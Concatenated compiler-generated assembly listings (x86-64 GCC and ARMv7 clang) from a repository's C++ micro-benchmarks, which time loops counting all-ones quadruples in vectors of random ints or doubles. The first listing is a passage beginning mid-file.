movl %edi, %ebx # ebx = n (becomes n - 1 below)
movl %edi, %ebp # ebp = n, the level-0 term
subq $8, %rsp # realign stack (4 pushes + 8 => 48)
.cfi_def_cfa_offset 48
subl $1, %ebx # level-1 argument: n - 1
jne .L28 # not zero - peel another level
.L2: # fold in the level-0 term
addl %ebp, %ebx
movl $1, %eax
cmpl $1, %ebp
cmovne %ebx, %eax # base case n == 1 yields 1
addq $8, %rsp
.cfi_remember_state
.cfi_def_cfa_offset 40
popq %rbx
.cfi_def_cfa_offset 32
popq %rbp
.cfi_def_cfa_offset 24
popq %r12
.cfi_def_cfa_offset 16
popq %r13
.cfi_def_cfa_offset 8
ret
.p2align 4,,10
.p2align 3
.L28:
.cfi_restore_state
movl %edi, %r12d
subl $2, %r12d # level-2 argument: n - 2
jne .L29
.L3: # fold in the level-1 term
addl %ebx, %r12d
cmpl $1, %ebx
cmovne %r12d, %ebx
jmp .L2
.p2align 4,,10
.p2align 3
.L29:
movl %edi, %r13d
subl $3, %r13d # level-3 argument: n - 3
jne .L30
.L4: # fold in the level-2 term
addl %r12d, %r13d
cmpl $1, %r12d
cmovne %r13d, %r12d
jmp .L3
.p2align 4,,10
.p2align 3
.L30:
movl %edi, %eax
subl $4, %eax # level-4 argument: n - 4
je .L5 # hit zero - recursion bottoms out with eax = 0
movl %eax, %edi
call _Z12sum_of_firstILi0ELi4EEii.part.2 # recurse with n - 4
.L5: # fold in the level-3 term
addl %r13d, %eax
cmpl $1, %r13d
cmovne %eax, %r13d
jmp .L4
.cfi_endproc
.LFE8:
.size _Z12sum_of_firstILi0ELi4EEii.part.2, .-_Z12sum_of_firstILi0ELi4EEii.part.2
.section .text.unlikely
.LCOLDE0:
.text
.LHOTE0:
.section .text.unlikely
.LCOLDB1:
.section .text.startup,"ax",@progbits
.LHOTB1:
.p2align 4,,15
.globl main
.type main, @function
# main: GCC constant-folded the four topmost terms
# (65536 + 65535 + 65534 + 65533 = 262138) and starts the unrolled
# worker at n = 65532.
main:
.LFB1:
.cfi_startproc
subq $8, %rsp # realign stack to 16 bytes for the call
.cfi_def_cfa_offset 16
movl $65532, %edi
call _Z12sum_of_firstILi0ELi4EEii.part.2
addq $8, %rsp
.cfi_def_cfa_offset 8
addl $262138, %eax # fold in the four precomputed top terms
ret
.cfi_endproc
.LFE1:
.size main, .-main
.section .text.unlikely
.LCOLDE1:
.section .text.startup
.LHOTE1:
.ident "GCC: (Ubuntu 5.4.0-6ubuntu1~16.04.10) 5.4.0 20160609"
.section .note.GNU-stack,"",@progbits
|
akalenuk/wordsandbuttons
| 14,585
|
exp/cpp_and_and/ARMv7/s/minus_abs_plus.s
|
.text
.syntax unified
.cpu cortex-a8
.eabi_attribute 6, 10 @ Tag_CPU_arch
.eabi_attribute 7, 65 @ Tag_CPU_arch_profile
.eabi_attribute 8, 1 @ Tag_ARM_ISA_use
.eabi_attribute 9, 2 @ Tag_THUMB_ISA_use
.fpu neon
.eabi_attribute 17, 1 @ Tag_ABI_PCS_GOT_use
.eabi_attribute 20, 1 @ Tag_ABI_FP_denormal
.eabi_attribute 21, 1 @ Tag_ABI_FP_exceptions
.eabi_attribute 23, 3 @ Tag_ABI_FP_number_model
.eabi_attribute 24, 1 @ Tag_ABI_align_needed
.eabi_attribute 25, 1 @ Tag_ABI_align_preserved
.eabi_attribute 28, 1 @ Tag_ABI_VFP_args
.eabi_attribute 18, 4 @ Tag_ABI_PCS_wchar_t
.eabi_attribute 26, 2 @ Tag_ABI_enum_size
.eabi_attribute 68, 1 @ Tag_Virtualization_use
.file "minus_abs_plus.cpp"
.globl main
.align 3
.type main,%function
main: @ @main
.fnstart
.Leh_func_begin0:
@ BB#0:
.save {r4, r5, r6, r7, r8, r10, r11, lr}
push {r4, r5, r6, r7, r8, r10, r11, lr}
.setfp r11, sp, #24
add r11, sp, #24
.pad #488
sub sp, sp, #488
.pad #2048
sub sp, sp, #2048
movw r2, #35173
add r3, sp, #32
mov r0, #0
mov r1, #1
movt r2, #27655
str r0, [sp, #32]
.LBB0_1: @ =>This Inner Loop Header: Depth=1
eor r0, r0, r0, lsr #30
mla r0, r0, r2, r1
str r0, [r3, r1, lsl #2]
add r1, r1, #1
cmp r1, #624
bne .LBB0_1
@ BB#2: @ %_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEC2Ej.exit
mov r0, #624
mov r5, #0
str r0, [sp, #2528]
mov r0, #1
str r5, [sp, #24]
str r0, [sp, #28]
.Ltmp0:
movw r8, #36864
movt r8, #976
mov r0, r8
bl _Znwj
mov r4, r0
.Ltmp1:
@ BB#3: @ %.lr.ph
mov r0, r4
mov r1, r8
mov r2, #0
bl __aeabi_memset
add r6, sp, #32
add r7, sp, #24
.LBB0_4: @ =>This Inner Loop Header: Depth=1
mov r0, r7
mov r1, r6
mov r2, r7
bl _ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE
str r0, [r4, r5]
add r5, r5, #4
cmp r5, r8
bne .LBB0_4
@ BB#5: @ %._crit_edge
add r0, sp, #8
mov r5, #0
str r5, [sp, #20]
bl _ZNSt6chrono3_V212system_clock3nowEv
movw r0, #36852
movt r0, #976
.LBB0_6: @ =>This Inner Loop Header: Depth=1
mov r1, r4
ldr r2, [r1, r5]!
add r5, r5, #4
ldmib r1, {r3, r7}
rsb r6, r2, #1
cmp r2, #0
subgt r6, r2, #1
rsb r2, r3, #1
cmp r3, #0
ldr r1, [r1, #12]
subgt r2, r3, #1
rsb r3, r7, #1
cmp r7, #0
add r2, r2, r6
subgt r3, r7, #1
cmp r1, #0
add r2, r2, r3
rsb r3, r1, #1
subgt r3, r1, #1
cmn r2, r3
ldreq r1, [sp, #20]
addeq r1, r1, #1
streq r1, [sp, #20]
cmp r5, r0
bne .LBB0_6
@ BB#7:
mov r0, sp
bl _ZNSt6chrono3_V212system_clock3nowEv
.Ltmp3:
movw r0, :lower16:_ZSt4cout
movw r1, :lower16:.L.str
movt r0, :upper16:_ZSt4cout
movt r1, :upper16:.L.str
mov r2, #6
bl _ZSt16__ostream_insertIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_PKS3_i
.Ltmp4:
@ BB#8:
ldr r0, [sp, #8]
ldr r1, [sp, #12]
ldm sp, {r2, r3}
subs r0, r2, r0
sbc r1, r3, r1
bl __aeabi_l2d
vldr d16, .LCPI0_0
vmov d17, r0, r1
vmul.f64 d0, d17, d16
.Ltmp5:
movw r0, :lower16:_ZSt4cout
movt r0, :upper16:_ZSt4cout
bl _ZNSo9_M_insertIdEERSoT_
mov r5, r0
.Ltmp6:
@ BB#9: @ %_ZNSolsEd.exit
.Ltmp7:
movw r1, :lower16:.L.str1
mov r0, r5
movt r1, :upper16:.L.str1
mov r2, #9
bl _ZSt16__ostream_insertIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_PKS3_i
.Ltmp8:
@ BB#10: @ %_ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc.exit8
ldr r1, [sp, #20]
.Ltmp9:
mov r0, r5
bl _ZNSo9_M_insertImEERSoT_
.Ltmp10:
@ BB#11: @ %_ZNSolsEj.exit
.Ltmp11:
movw r1, :lower16:.L.str2
mov r2, #1
movt r1, :upper16:.L.str2
bl _ZSt16__ostream_insertIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_PKS3_i
.Ltmp12:
@ BB#12: @ %_ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc.exit
cmp r4, #0
beq .LBB0_14
@ BB#13:
mov r0, r4
bl _ZdlPv
.LBB0_14: @ %_ZNSt6vectorIiSaIiEED2Ev.exit
mov r0, #0
sub sp, r11, #24
pop {r4, r5, r6, r7, r8, r10, r11, pc}
.LBB0_15:
.Ltmp13:
mov r5, r0
cmp r4, #0
beq .LBB0_18
@ BB#16:
mov r0, r4
bl _ZdlPv
mov r0, r5
bl _Unwind_Resume
.LBB0_17:
.Ltmp2:
mov r5, r0
.LBB0_18: @ %_ZNSt6vectorIiSaIiEED2Ev.exit10
mov r0, r5
bl _Unwind_Resume
.align 3
@ BB#19:
.LCPI0_0:
.long 3894859413 @ double 1.0000000000000001E-9
.long 1041313291
.Ltmp14:
.size main, .Ltmp14-main
.Leh_func_end0:
.globl __gxx_personality_v0
.personality __gxx_personality_v0
.handlerdata
.align 2
GCC_except_table0:
.Lexception0:
.byte 255 @ @LPStart Encoding = omit
.byte 0 @ @TType Encoding = absptr
.asciz "\320" @ @TType base offset
.byte 3 @ Call site Encoding = udata4
.byte 78 @ Call site table length
.Lset0 = .Ltmp0-.Leh_func_begin0 @ >> Call Site 1 <<
.long .Lset0
.Lset1 = .Ltmp1-.Ltmp0 @ Call between .Ltmp0 and .Ltmp1
.long .Lset1
.Lset2 = .Ltmp2-.Leh_func_begin0 @ jumps to .Ltmp2
.long .Lset2
.byte 0 @ On action: cleanup
.Lset3 = .Ltmp1-.Leh_func_begin0 @ >> Call Site 2 <<
.long .Lset3
.Lset4 = .Ltmp3-.Ltmp1 @ Call between .Ltmp1 and .Ltmp3
.long .Lset4
.long 0 @ has no landing pad
.byte 0 @ On action: cleanup
.Lset5 = .Ltmp3-.Leh_func_begin0 @ >> Call Site 3 <<
.long .Lset5
.Lset6 = .Ltmp4-.Ltmp3 @ Call between .Ltmp3 and .Ltmp4
.long .Lset6
.Lset7 = .Ltmp13-.Leh_func_begin0 @ jumps to .Ltmp13
.long .Lset7
.byte 0 @ On action: cleanup
.Lset8 = .Ltmp4-.Leh_func_begin0 @ >> Call Site 4 <<
.long .Lset8
.Lset9 = .Ltmp5-.Ltmp4 @ Call between .Ltmp4 and .Ltmp5
.long .Lset9
.long 0 @ has no landing pad
.byte 0 @ On action: cleanup
.Lset10 = .Ltmp5-.Leh_func_begin0 @ >> Call Site 5 <<
.long .Lset10
.Lset11 = .Ltmp12-.Ltmp5 @ Call between .Ltmp5 and .Ltmp12
.long .Lset11
.Lset12 = .Ltmp13-.Leh_func_begin0 @ jumps to .Ltmp13
.long .Lset12
.byte 0 @ On action: cleanup
.Lset13 = .Ltmp12-.Leh_func_begin0 @ >> Call Site 6 <<
.long .Lset13
.Lset14 = .Leh_func_end0-.Ltmp12 @ Call between .Ltmp12 and .Leh_func_end0
.long .Lset14
.long 0 @ has no landing pad
.byte 0 @ On action: cleanup
.align 2
.fnend
.section .text._ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE,"axG",%progbits,_ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE,comdat
.weak _ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE
.align 2
.type _ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE,%function
_ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE: @ @_ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE
.fnstart
.Leh_func_begin1:
@ BB#0:
.save {r4, r5, r6, r7, r8, r9, r11, lr}
push {r4, r5, r6, r7, r8, r9, r11, lr}
.setfp r11, sp, #24
add r11, sp, #24
mov r9, r2
mov r5, r1
ldm r9, {r0, r1}
sub r0, r1, r0
cmn r0, #1
beq .LBB1_6
@ BB#1:
add r7, r0, #1
mvn r0, #0
mov r1, r7
bl __aeabi_uidiv
mov r8, r0
ldr r1, [r5, #2496]
mul r7, r8, r7
movw r6, #22144
movw r4, #0
movt r6, #40236
movt r4, #61382
.LBB1_2: @ =>This Inner Loop Header: Depth=1
cmp r1, #624
blo .LBB1_4
@ BB#3: @ in Loop: Header=BB1_2 Depth=1
mov r0, r5
bl _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
ldr r1, [r5, #2496]
.LBB1_4: @ %_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEclEv.exit2
@ in Loop: Header=BB1_2 Depth=1
add r2, r1, #1
str r2, [r5, #2496]
ldr r0, [r5, r1, lsl #2]
eor r0, r0, r0, lsr #11
and r1, r6, r0, lsl #7
eor r0, r1, r0
and r1, r4, r0, lsl #15
eor r0, r1, r0
mov r1, r2
eor r0, r0, r0, lsr #18
cmp r0, r7
bhs .LBB1_2
@ BB#5:
mov r1, r8
bl __aeabi_uidiv
b .LBB1_9
.LBB1_6:
ldr r0, [r5, #2496]
cmp r0, #624
blo .LBB1_8
@ BB#7:
mov r0, r5
bl _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
ldr r0, [r5, #2496]
.LBB1_8: @ %_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEclEv.exit
add r1, r0, #1
str r1, [r5, #2496]
ldr r0, [r5, r0, lsl #2]
movw r1, #22144
movt r1, #40236
eor r0, r0, r0, lsr #11
and r1, r1, r0, lsl #7
eor r0, r1, r0
movw r1, #0
movt r1, #61382
and r1, r1, r0, lsl #15
eor r0, r1, r0
eor r0, r0, r0, lsr #18
.LBB1_9:
ldr r1, [r9]
add r0, r1, r0
pop {r4, r5, r6, r7, r8, r9, r11, pc}
.Ltmp15:
.size _ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE, .Ltmp15-_ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE
.cantunwind
.fnend
.section .text._ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv,"axG",%progbits,_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv,comdat
.weak _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
.align 2
.type _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv,%function
@ MT19937 state refresh (std::mersenne_twister_engine::_M_gen_rand):
@ regenerates all 624 state words in place and resets the extraction index
@ (at byte offset 2496) to 0.  In: r0 = engine state.
@ r12 = 0x9908b0df (movt #39176 / movw #45279), the MT19937 twist constant.
@ Each step: y = (state[i] & 0x80000000) | (state[i+1] & 0x7fffffff);
@ state[i] = partner ^ (y >> 1) ^ (y odd ? 0x9908b0df : 0).
_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv: @ @_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
.fnstart
.Leh_func_begin2:
@ BB#0:
.save {r4, r5, r11, lr}
push {r4, r5, r11, lr}
ldr lr, [r0] @ lr = state[0]
movw r12, #45279 @ r12 = 0x9908b0df (twist constant)
mov r2, #0 @ byte offset i = 0
movt r12, #39176
.LBB2_1: @ =>This Inner Loop Header: Depth=1
@ First pass (227 words): partner word is state[i+397] (offset +1588).
add r1, r0, r2
ldr r3, [r1, #4] @ r3 = state[i+1]
ldr r5, [r1, #1588] @ r5 = state[i+397]
and r1, lr, #-2147483648 @ high bit of state[i]
bic r4, r3, #-2147483647 @ low 31 bits of state[i+1]
tst r3, #1 @ is y odd?
orr r1, r4, r1 @ y
mov lr, r3 @ carry state[i+1] into the next iteration
eor r1, r5, r1, lsr #1 @ partner ^ (y >> 1)
eorne r1, r1, r12 @ ... ^ twist constant when y is odd
str r1, [r0, r2]
add r2, r2, #4
cmp r2, #908 @ 227 words (624 - 397) done?
bne .LBB2_1
@ BB#2: @ %.preheader
@ Second pass: remaining words; the +397 partner now wraps into the
@ freshly updated low words (addressed via decreasing negative offsets).
ldr r4, [r0, #908]
mov r2, #0
.LBB2_3: @ =>This Inner Loop Header: Depth=1
rsb r1, r2, #0
mov r5, r0
and r4, r4, #-2147483648
sub r2, r2, #1
ldr lr, [r5, r1, lsl #2]! @ wrapped partner word
ldr r3, [r5, #912]
bic r1, r3, #-2147483647
tst r3, #1
orr r1, r1, r4
mov r4, r3
eor r1, lr, r1, lsr #1
eorne r1, r1, r12
str r1, [r5, #908]
cmn r2, #396 @ 396 more words processed?
bne .LBB2_3
@ BB#4:
@ Final word: state[623] uses state[0] for the low bits and state[396]
@ (offset 1584) as partner; then reset the extraction index.
ldr r1, [r0, #2492]
ldr r2, [r0]
and r1, r1, #-2147483648
ldr r3, [r0, #1584]
bic r5, r2, #-2147483647
tst r2, #1
orr r1, r5, r1
mov r2, #0
eor r1, r3, r1, lsr #1
eorne r1, r1, r12
str r1, [r0, #2492]
str r2, [r0, #2496] @ index = 0: buffer fully regenerated
pop {r4, r5, r11, pc}
.Ltmp16:
.size _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv, .Ltmp16-_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
.cantunwind
.fnend
.section .text.startup,"ax",%progbits
.align 2
.type _GLOBAL__sub_I_minus_abs_plus.cpp,%function
@ Static-initialization thunk for this translation unit: constructs the
@ std::ios_base::Init guard object and registers its destructor with
@ __cxa_atexit.  The registration is a tail call made after lr is restored.
_GLOBAL__sub_I_minus_abs_plus.cpp: @ @_GLOBAL__sub_I_minus_abs_plus.cpp
.fnstart
.Leh_func_begin3:
@ BB#0:
.save {r4, r10, r11, lr}
push {r4, r10, r11, lr}
.setfp r11, sp, #8
add r11, sp, #8
movw r4, :lower16:_ZStL8__ioinit @ r4 = &__ioinit guard object
movt r4, :upper16:_ZStL8__ioinit
mov r0, r4
bl _ZNSt8ios_base4InitC1Ev @ std::ios_base::Init::Init()
movw r0, :lower16:_ZNSt8ios_base4InitD1Ev @ arg0: destructor to run at exit
movw r2, :lower16:__dso_handle @ arg2: this DSO's handle
movt r0, :upper16:_ZNSt8ios_base4InitD1Ev
movt r2, :upper16:__dso_handle
mov r1, r4 @ arg1: the object itself
pop {r4, r10, r11, lr}
b __cxa_atexit @ tail-call the atexit registration
.Ltmp17:
.size _GLOBAL__sub_I_minus_abs_plus.cpp, .Ltmp17-_GLOBAL__sub_I_minus_abs_plus.cpp
.Leh_func_end3:
.fnend
.type _ZStL8__ioinit,%object @ @_ZStL8__ioinit
.local _ZStL8__ioinit
.comm _ZStL8__ioinit,1,1
.type .L.str,%object @ @.str
.section .rodata.str1.1,"aMS",%progbits,1
.L.str:
.asciz "time: "
.size .L.str, 7
.type .L.str1,%object @ @.str1
.L.str1:
.asciz " 1111s: "
.size .L.str1, 10
.type .L.str2,%object @ @.str2
.L.str2:
.asciz "\n"
.size .L.str2, 2
.section .init_array,"aw",%init_array
.align 2
.long _GLOBAL__sub_I_minus_abs_plus.cpp(target1)
.ident "Debian clang version 3.5.0-10 (tags/RELEASE_350/final) (based on LLVM 3.5.0)"
|
akalenuk/wordsandbuttons
| 14,987
|
exp/cpp_and_and/ARMv7/s/minus_mul_double_plus.s
|
.text
.syntax unified
.cpu cortex-a8
.eabi_attribute 6, 10 @ Tag_CPU_arch
.eabi_attribute 7, 65 @ Tag_CPU_arch_profile
.eabi_attribute 8, 1 @ Tag_ARM_ISA_use
.eabi_attribute 9, 2 @ Tag_THUMB_ISA_use
.fpu neon
.eabi_attribute 17, 1 @ Tag_ABI_PCS_GOT_use
.eabi_attribute 20, 1 @ Tag_ABI_FP_denormal
.eabi_attribute 21, 1 @ Tag_ABI_FP_exceptions
.eabi_attribute 23, 3 @ Tag_ABI_FP_number_model
.eabi_attribute 24, 1 @ Tag_ABI_align_needed
.eabi_attribute 25, 1 @ Tag_ABI_align_preserved
.eabi_attribute 28, 1 @ Tag_ABI_VFP_args
.eabi_attribute 18, 4 @ Tag_ABI_PCS_wchar_t
.eabi_attribute 26, 2 @ Tag_ABI_enum_size
.eabi_attribute 68, 1 @ Tag_Virtualization_use
.file "minus_mul_plus_double.cpp"
.globl _Z2sqd
.align 2
.type _Z2sqd,%function
@ double sq(double x) { return x * x; }
@ AAPCS VFP hard-float: argument and return value both live in d0.
_Z2sqd: @ @_Z2sqd
.fnstart
.Leh_func_begin0:
@ BB#0:
vmul.f64 d0, d0, d0 @ d0 = x * x
bx lr
.Ltmp0:
.size _Z2sqd, .Ltmp0-_Z2sqd
.cantunwind
.fnend
.globl main
.align 3
.type main,%function
main: @ @main
.fnstart
.Leh_func_begin1:
@ BB#0:
.save {r4, r5, r6, r7, r8, r10, r11, lr}
push {r4, r5, r6, r7, r8, r10, r11, lr}
.setfp r11, sp, #24
add r11, sp, #24
.pad #488
sub sp, sp, #488
.pad #2048
sub sp, sp, #2048
movw r2, #35173
add r3, sp, #32
mov r0, #0
mov r1, #1
movt r2, #27655
str r0, [sp, #32]
.LBB1_1: @ =>This Inner Loop Header: Depth=1
eor r0, r0, r0, lsr #30
mla r0, r0, r2, r1
str r0, [r3, r1, lsl #2]
add r1, r1, #1
cmp r1, #624
bne .LBB1_1
@ BB#2: @ %_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEC2Ej.exit
mov r0, #624
mov r5, #0
str r0, [sp, #2528]
mov r0, #1
str r5, [sp, #24]
str r0, [sp, #28]
.Ltmp1:
movw r8, #8192
movt r8, #1953
mov r0, r8
bl _Znwj
mov r4, r0
.Ltmp2:
@ BB#3: @ %.lr.ph
mov r0, r4
mov r1, r8
mov r2, #0
bl __aeabi_memset
add r6, sp, #32
add r7, sp, #24
.LBB1_4: @ =>This Inner Loop Header: Depth=1
mov r0, r7
mov r1, r6
mov r2, r7
bl _ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE
vmov s0, r0
add r0, r4, r5
add r5, r5, #8
vcvt.f64.s32 d16, s0
cmp r5, r8
vstr d16, [r0]
bne .LBB1_4
@ BB#5: @ %._crit_edge
add r0, sp, #8
mov r5, #0
str r5, [sp, #20]
bl _ZNSt6chrono3_V212system_clock3nowEv
vmov.f64 d16, #-1.000000e+00
movw r0, #8168
movt r0, #1953
.LBB1_6: @ =>This Inner Loop Header: Depth=1
add r1, r4, r5
add r5, r5, #8
vldmia r1, {d17, d18, d19, d20}
vadd.f64 d18, d18, d16
vadd.f64 d17, d17, d16
vadd.f64 d19, d19, d16
vmul.f64 d18, d18, d18
vmul.f64 d17, d17, d17
vadd.f64 d20, d20, d16
vmul.f64 d19, d19, d19
vadd.f64 d17, d17, d18
vmul.f64 d18, d20, d20
vadd.f64 d17, d17, d19
vadd.f64 d17, d17, d18
vcmpe.f64 d17, #0
vmrs APSR_nzcv, fpscr
ldreq r1, [sp, #20]
addeq r1, r1, #1
streq r1, [sp, #20]
cmp r5, r0
bne .LBB1_6
@ BB#7:
mov r0, sp
bl _ZNSt6chrono3_V212system_clock3nowEv
.Ltmp4:
movw r0, :lower16:_ZSt4cout
movw r1, :lower16:.L.str
movt r0, :upper16:_ZSt4cout
movt r1, :upper16:.L.str
mov r2, #6
bl _ZSt16__ostream_insertIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_PKS3_i
.Ltmp5:
@ BB#8:
ldr r0, [sp, #8]
ldr r1, [sp, #12]
ldm sp, {r2, r3}
subs r0, r2, r0
sbc r1, r3, r1
bl __aeabi_l2d
vldr d16, .LCPI1_0
vmov d17, r0, r1
vmul.f64 d0, d17, d16
.Ltmp6:
movw r0, :lower16:_ZSt4cout
movt r0, :upper16:_ZSt4cout
bl _ZNSo9_M_insertIdEERSoT_
mov r5, r0
.Ltmp7:
@ BB#9: @ %_ZNSolsEd.exit
.Ltmp8:
movw r1, :lower16:.L.str1
mov r0, r5
movt r1, :upper16:.L.str1
mov r2, #9
bl _ZSt16__ostream_insertIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_PKS3_i
.Ltmp9:
@ BB#10: @ %_ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc.exit2
ldr r1, [sp, #20]
.Ltmp10:
mov r0, r5
bl _ZNSo9_M_insertImEERSoT_
.Ltmp11:
@ BB#11: @ %_ZNSolsEj.exit
.Ltmp12:
movw r1, :lower16:.L.str2
mov r2, #1
movt r1, :upper16:.L.str2
bl _ZSt16__ostream_insertIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_PKS3_i
.Ltmp13:
@ BB#12: @ %_ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc.exit
cmp r4, #0
beq .LBB1_14
@ BB#13:
mov r0, r4
bl _ZdlPv
.LBB1_14: @ %_ZNSt6vectorIdSaIdEED2Ev.exit
mov r0, #0
sub sp, r11, #24
pop {r4, r5, r6, r7, r8, r10, r11, pc}
.LBB1_15:
.Ltmp14:
mov r5, r0
cmp r4, #0
beq .LBB1_18
@ BB#16:
mov r0, r4
bl _ZdlPv
mov r0, r5
bl _Unwind_Resume
.LBB1_17:
.Ltmp3:
mov r5, r0
.LBB1_18: @ %_ZNSt6vectorIdSaIdEED2Ev.exit4
mov r0, r5
bl _Unwind_Resume
.align 3
@ BB#19:
.LCPI1_0:
.long 3894859413 @ double 1.0000000000000001E-9
.long 1041313291
.Ltmp15:
.size main, .Ltmp15-main
.Leh_func_end1:
.globl __gxx_personality_v0
.personality __gxx_personality_v0
.handlerdata
.align 2
GCC_except_table1:
.Lexception1:
.byte 255 @ @LPStart Encoding = omit
.byte 0 @ @TType Encoding = absptr
.asciz "\320" @ @TType base offset
.byte 3 @ Call site Encoding = udata4
.byte 78 @ Call site table length
.Lset0 = .Ltmp1-.Leh_func_begin1 @ >> Call Site 1 <<
.long .Lset0
.Lset1 = .Ltmp2-.Ltmp1 @ Call between .Ltmp1 and .Ltmp2
.long .Lset1
.Lset2 = .Ltmp3-.Leh_func_begin1 @ jumps to .Ltmp3
.long .Lset2
.byte 0 @ On action: cleanup
.Lset3 = .Ltmp2-.Leh_func_begin1 @ >> Call Site 2 <<
.long .Lset3
.Lset4 = .Ltmp4-.Ltmp2 @ Call between .Ltmp2 and .Ltmp4
.long .Lset4
.long 0 @ has no landing pad
.byte 0 @ On action: cleanup
.Lset5 = .Ltmp4-.Leh_func_begin1 @ >> Call Site 3 <<
.long .Lset5
.Lset6 = .Ltmp5-.Ltmp4 @ Call between .Ltmp4 and .Ltmp5
.long .Lset6
.Lset7 = .Ltmp14-.Leh_func_begin1 @ jumps to .Ltmp14
.long .Lset7
.byte 0 @ On action: cleanup
.Lset8 = .Ltmp5-.Leh_func_begin1 @ >> Call Site 4 <<
.long .Lset8
.Lset9 = .Ltmp6-.Ltmp5 @ Call between .Ltmp5 and .Ltmp6
.long .Lset9
.long 0 @ has no landing pad
.byte 0 @ On action: cleanup
.Lset10 = .Ltmp6-.Leh_func_begin1 @ >> Call Site 5 <<
.long .Lset10
.Lset11 = .Ltmp13-.Ltmp6 @ Call between .Ltmp6 and .Ltmp13
.long .Lset11
.Lset12 = .Ltmp14-.Leh_func_begin1 @ jumps to .Ltmp14
.long .Lset12
.byte 0 @ On action: cleanup
